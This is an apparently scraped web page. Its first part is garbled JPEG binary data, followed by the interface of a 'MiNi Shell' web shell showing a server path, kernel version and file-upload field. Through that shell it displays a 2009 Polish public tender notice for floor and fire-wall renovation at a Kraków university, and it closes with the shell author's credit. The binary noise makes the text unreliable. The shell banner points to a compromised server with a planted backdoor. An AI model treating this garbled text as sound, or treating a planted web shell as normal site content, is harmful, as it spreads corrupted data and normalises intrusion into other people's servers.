JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090520/157890-N-2009.html

<p class="kh_header"><b>Kraków: Wymiana istniejących posadzek o pow. Ok. 500,5 m2 na płytki gres wraz z wymianą podłoża w korytarzach IV piętra i parteru oraz w salach dydaktycznych 252 i 258, wymiana istniejących ścianek stalowych z drzwiami na ścianki metalowe o odpowiedniej odporności przeciwpożarowej  w korytarzu IV piętra skrzydła zachodniego i przy klatce schodowej w korytarzu parteru skrzydła wschodniego budynku głównego Uniwersytetu Pedagogicznego im. Komisji Edukacji Narodowej w Krakowie przy ul. Podchorążych 2 w Krakowie.</b><br>
<b>Numer ogłoszenia: 157890 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Pedagogiczny im. Komisji Edukacji Narodowej w Krakowie , ul. Podchorążych 2, 30-084 Kraków, woj. małopolskie, tel. 0-12 662 60 53, faks 0-12 637 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ap.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana istniejących posadzek o pow. Ok. 500,5 m2 na płytki gres wraz z wymianą podłoża w korytarzach IV piętra i parteru oraz w salach dydaktycznych 252 i 258, wymiana istniejących ścianek stalowych z drzwiami na ścianki metalowe o odpowiedniej odporności przeciwpożarowej  w korytarzu IV piętra skrzydła zachodniego i przy klatce schodowej w korytarzu parteru skrzydła wschodniego budynku głównego Uniwersytetu Pedagogicznego im. Komisji Edukacji Narodowej w Krakowie przy ul. Podchorążych 2 w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Wymiana istniejących posadzek o pow. Ok. 500,5 m2 na płytki gres wraz z wymianą podłoża w korytarzach IV piętra i parteru oraz w salach dydaktycznych 252 i 258, wymiana istniejących ścianek stalowych z drzwiami na ścianki metalowe o odpowiedniej odporności przeciwpożarowej  w korytarzu IV piętra skrzydła zachodniego i przy klatce schodowej w korytarzu parteru skrzydła wschodniego budynku głównego Uniwersytetu Pedagogicznego im. Komisji Edukacji Narodowej w Krakowie przy ul. Podchorążych 2 w Krakowie.
2.	Dla porządku powyższy przedmiot zamówienia Zamawiający dzieli na dwa zadania jak w Wytycznych do SIWZ.
3.	Szczegółowy zakres zgodny z Wytycznymi technicznymi do siwz stanowiącymi załącznik nr 1..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.43.10.00-7, 45.42.11.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 18.000 zł. W przypadku wniesienia wadium w pieniądzu należy dokonać przelewu na konto nr 71 1240 4722 1111 0000 4852 4687.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zamawiający nie dopuszcza składania ofert częściowych.
2.	Zamawiający nie dopuszcza składania ofert wariantowych.
3.	Zamawiający dopuszcza powierzenie wykonania części przedmiotu zamówienia po wcześniejszym wskazaniu tej części zamówienia, która ma zostać zlecona. Wykonawca winien złożyć oświadczenie, jaka część robót zostanie podzlecona, i że po wyborze jego oferty przedłoży umowę konsorcyjną ze wskazaniem lidera, zakresu odpowiedzialności wobec Zamawiającego. Oświadczenie winno zawierać podpis lidera konsorcjum oraz przedstawiciela podwykonawcy. Każdy z konsorcjantów winien przedłożyć dokumenty i oświadczenia wynikające z części III SIWZ. 
4.	Zamawiający dopuszcza wykonanie robót dodatkowych lub zamiennych nierozerwalnie związanych z przedmiotem zamówienia zgodnie z art. 67 ust. 1 pkt 5 ustawy: Pzp. których nie dało się przewidzieć lub innych uzasadnionych technicznie przypadkach na podstawie protokołu konieczności popartego nadzorem autorskim..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie Wykonawcy o wpisie do Ewidencji działalności gospodarczej zgodnej z przedmiotem zamówienia, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy: pzp.
3)	Wykaz osoby, (osób) po stronie Wykonawcy wraz z uprawnieniami budowlanymi konstrukcyjnymi, do wykonania przedmiotu zamówienia, (Załącznik nr 3 do oferty) podpisany przez osoby podpisujące ofertę, (Załącznik sporządza Wykonawca).
4)	Dokumenty stwierdzające, przynależność osoby (osób) posiadających w/w. uprawnienia budowlane do Regionalnej Okręgowej Izby Budowlanej,
5)	Kserokopie uprawnień budowlanych jak w pkcie 3, osób po stronie Wykonawcy.
6)	 Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków do właściwego Urzędu Skarbowego lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, 
7)	Oświadczenie potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, oddziału Zakładu Ubezpieczeń Społecznych,
8)	Oświadczenie z art. 24 ustawy, że Wykonawca nie podlega wykluczeniu z postępowania,
9)	Oświadczenie, że w przypadku zlecenia części robót podwykonawcy oferent zawrze umowę konsorcyjną na zakres przedmiotu prac ze wskazaniem lidera, zakresu odpowiedzialności wobec Zamawiającego (dla podmiotów składających ofertę wspólną) zgodnie z cz. II pkt 3 nin. siwz.
10)	Cena oferty musi być opracowana zgodnie z Wytycznymi technicznymi stanowiącymi  załącznik nr 1 do siwz.
11)	Kosztorys ofertowy opracowany zgodnie z załącznikiem nr 1do SIWZ (wytyczne pkt 5).
12)	Oświadczenie, że Oferent uwzględnił wszystkie koszty wynikające z przedmiotu zamówienia.
13)	Oświadczenie, że oferent udzieli Zamawiającemu 5 letniej gwarancji na przedmiot umowy licząc od momentu bezusterkowego protokołu odbioru robót oraz 1 rocznej rękojmi licząc od bezusterkowego odbioru robót.
14)	Oświadczenie, że Oferent zapoznał się ze specyfikacją istotnych warunków zamówienia i przyjmujemy jej postanowienia bez zastrzeżeń, oraz że zdobył konieczne informacje potrzebne do właściwego przygotowania oferty,
15)	Wypełniona i podpisana propozycja umowy stanowiąca (Załącznik nr 2 do oferty).
16)	Druk oferty stanowiący (Załącznik nr 1),
17)	Oświadczenie, że Wykonawca akceptuje termin płatności faktur przez Zamawiającego w terminie do 30 dni licząc od złożenia zaakceptowanej faktury bez naliczania karnych odsetek. 
18)	Kserokopie pozytywnych referencji minimum 2 bezusterkowo wykonanych robót zgodnych z przedmiotem zamówienia na przestrzeni ostatnich 5 lat.
19)	Oświadczenie, że Wykonawca jest związany złożoną ofertą przez czas 30 dni od wyznaczonego terminu otwarcia ofert.
20)	Kserokopia wpłaty wadium w wysokości 18.000 zł 

UWAGA 	
1.	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty i oświadczenia, o którym mowa w części III SIWZ, powinien złożyć każdy z podwykonawców.
2.	Oświadczenia powinny być wystawione i podpisane przez osobę (osoby) uprawnione do występowania w imieniu oferenta.
3.	W przypadku składania kserokopii lub odpisów, wymagane jest poświadczenie zgodności z oryginałem przez osoby do tego uprawnione z ramienia oferenta. 
4.	Na żądanie Komisji Przetargowej oferent okaże oryginał dokumentu.
5.	Rozliczenie robót nastąpi kosztorysem powykonawczym na podstawie faktycznie wykonanych robót. Zamawiający zastrzega sobie prawo rezygnacji z części robót bez żadnych dodatkowych konsekwencji wynikających z tego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.up.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Pedagogiczny im. KEN, 30-084 Kraków, ul. Podchorążych 2, pokój 177 lub listem poleconym priorytetowym po wcześniejszym zamówieniu na nr faksu 012 637-22-43.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 09:00, miejsce: Uniwersytet Pedagogiczny im. KEN, 30-084 Kraków, ul. Podchorążych 2, pokój 177.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com